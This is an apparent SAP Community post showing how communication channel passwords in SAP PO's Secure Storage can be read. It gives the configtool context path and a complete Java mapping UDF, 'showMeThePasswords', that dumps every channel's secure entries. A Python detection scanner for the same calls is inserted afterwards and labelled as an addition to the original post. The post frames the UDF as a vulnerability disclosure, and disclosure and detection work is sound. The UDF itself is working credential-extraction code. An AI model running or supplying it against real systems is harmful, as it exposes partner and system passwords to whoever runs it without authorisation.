maxi1555
Contributor
Hi experts,

More than one year ago I published how to recover your communication channel passwords in a very simple way, but this approach no longer works in the latest versions due to a patch. Since that moment I have been curious about how the CC passwords are stored in the system.

I found that the application responsible for retrieving and storing the CC passwords uses the "Secure Storage", in other words the most "secure" way to protect them (is that really true?...).

So the first question that popped into my head was "is there any way to find all this secured data in the system?", and guess what... the configtool is the answer 🙂. You can navigate through all the properties of all the applications running in the system (the "context"). But why is this so important? If you understand how to use the secure storage in the system, you should know that the "context" is where the "secured" data is stored, and it's the only thing required to retrieve this data.

Let's say that you want to navigate to the communication channel secured data through the configtool (context = "cluster_config/system/custom_global/cfg/apps/sap.com/com.sap.xi.directory/appcfg/Channel/<channel id>/<channel version>"):


As you can imagine, the password values are those entries flagged as "secure content".

The second question in my head was so obvious: "is there any way to get those values from Java code?", and the answer is the following UDF:
```java
import java.util.Iterator;
import java.util.Map;
import javax.naming.*;
import com.sap.engine.frame.core.configuration.*;
import com.sap.engine.frame.core.configuration.addons.*;
import com.sap.engine.services.configuration.appconfiguration.*;

public void showMeThePasswords(String[] i_ids, String[] i_versions, ResultList o_ids, ResultList o_versions, ResultList o_properties, ResultList o_values, Container container) throws StreamTransformationException
{
    try
    {
        // Look up the application configuration service through JNDI
        javax.naming.Context ctx = new InitialContext();
        ApplicationConfigHandlerFactory appCfgHdlFctry = (ApplicationConfigHandlerFactory) ctx.lookup("ApplicationConfiguration");
        if (appCfgHdlFctry != null) {
            // Get a handler that can open any configuration path
            ConfigurationHandlerFactory fullFactory = appCfgHdlFctry.getConfigurationHandlerFactory();
            ConfigurationHandler fullHandler = fullFactory.getConfigurationHandler();
            int context_len = i_ids.length;
            String strPath;
            for (int index = 0; index < context_len; index++) {
                // Context of one channel: .../Channel/<channel id>/<channel version>
                strPath = "cluster_config/system/custom_global/cfg/apps/sap.com/com.sap.xi.directory/appcfg/Channel/" + i_ids[index] + "/" + i_versions[index];
                try
                {
                    Configuration conf = fullHandler.openConfiguration(strPath, 0, true);
                    // Retry the read until it is consistent
                    boolean bTryAgain = true;
                    Map entries = null;
                    while (bTryAgain) {
                        bTryAgain = false;
                        try {
                            entries = conf.getAllConfigEntries();
                        } catch (InconsistentReadException ire) {
                            bTryAgain = true;
                        }
                    }
                    if (entries != null)
                    {
                        // Emit every non-empty property of the channel, secure entries included
                        Object key = null;
                        Object value = null;
                        for (Iterator iter = entries.keySet().iterator(); iter.hasNext(); ) {
                            key = iter.next();
                            value = entries.get(key);
                            if (key != null && value != null && !"".equals(value.toString())) {
                                o_ids.addValue(i_ids[index]);
                                o_versions.addValue(i_versions[index]);
                                o_properties.addValue(key.toString());
                                o_values.addValue(value.toString());
                            }
                        }
                    } else {
                        // No entries: emit an empty row for this channel
                        o_ids.addValue(i_ids[index]);
                        o_versions.addValue(i_versions[index]);
                        o_properties.addValue("");
                        o_values.addValue("");
                    }
                } catch (Exception e) {
                    // Channel could not be read: emit an empty row and continue
                    o_ids.addValue(i_ids[index]);
                    o_versions.addValue(i_versions[index]);
                    o_properties.addValue("");
                    o_values.addValue("");
                }
            }
        }
    } catch (Exception e) {
        // Lookup or handler creation failed: return the error message in every queue
        o_ids.addValue(e.getMessage());
        o_versions.addValue(e.getMessage());
        o_properties.addValue(e.getMessage());
        o_values.addValue(e.getMessage());
    }
}
```

Well, as you can see, in a few lines of code it is possible to read all the "secured" data related to the communication channels (passwords!) in the system, so I have the following open questions:

  1. How secure is the system for you?

  2. Should the passwords be better protected?

  3. Should the configuration of the apps be better protected?


Knowing that there are 10 more years of SAP PO support, I hope to see more security patches to solve these issues (I found at least 3 different ways to get the CC passwords).
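A review-side check for the pattern in the UDF above, as an added example that is not part of the original post: a Python scanner that flags mapping source code which reaches the AS Java configuration manager. It assumes UDF or function library source is available as plain text; the indicators are taken from the code on this page, while the function names, priority labels and sample snippets are constructed for illustration.

```python
import re

# Indicators taken from the UDF on this page: configuration-manager packages,
# the JNDI name it looks up, the calls it makes, and the channel context path.
INDICATORS = {
    "config-api-import": re.compile(
        r"com\.sap\.engine\.(frame\.core|services)\.configuration"),
    "jndi-appconfig-lookup": re.compile(
        r'lookup\s*\(\s*"ApplicationConfiguration"\s*\)'),
    "open-configuration": re.compile(r"\.openConfiguration\s*\("),
    "read-all-entries": re.compile(r"\.getAllConfigEntries\s*\("),
    "channel-context-path": re.compile(r"com\.sap\.xi\.directory/appcfg/Channel"),
}
HIGH = {"jndi-appconfig-lookup", "read-all-entries", "channel-context-path"}
_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def strip_comments(source):
    """Blank out // and /* */ comments; keep string literals and line numbers."""
    def repl(m):
        text = m.group(0)
        return text if text.startswith('"') else re.sub(r"[^\n]", " ", text)
    return _TOKEN.sub(repl, source)

def scan_udf(name, source):
    """Return (name, line_no, indicator) findings for one exported source text."""
    findings = []
    for line_no, line in enumerate(strip_comments(source).splitlines(), 1):
        for label, rx in INDICATORS.items():
            if rx.search(line):
                findings.append((name, line_no, label))
    return findings

def priority(findings):
    """'high' if secure entries are read or located, 'low' for any other hit."""
    labels = {label for _, _, label in findings}
    if labels & HIGH:
        return "high"
    return "low" if labels else "none"

# Constructed samples: one mirrors the calls in the UDF above, one is benign.
SUSPECT = '''import com.sap.engine.frame.core.configuration.*;
// lookup("ApplicationConfiguration") appears here only inside a comment
Object f = ctx.lookup("ApplicationConfiguration");
Configuration c = h.openConfiguration(path, 0, true);
Map m = c.getAllConfigEntries();
'''
BENIGN = '''// com.sap.engine.frame.core.configuration is not used here
String out = in.trim().toUpperCase();
'''
```

Calling `scan_udf("suspect_udf", SUSPECT)` reports the import, the JNDI lookup, the open call and the entry read with their line numbers, and `priority` rates that set as high; mentions that occur only inside comments are ignored.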

 

Don't forget, be curious!

Best Regards.

Max.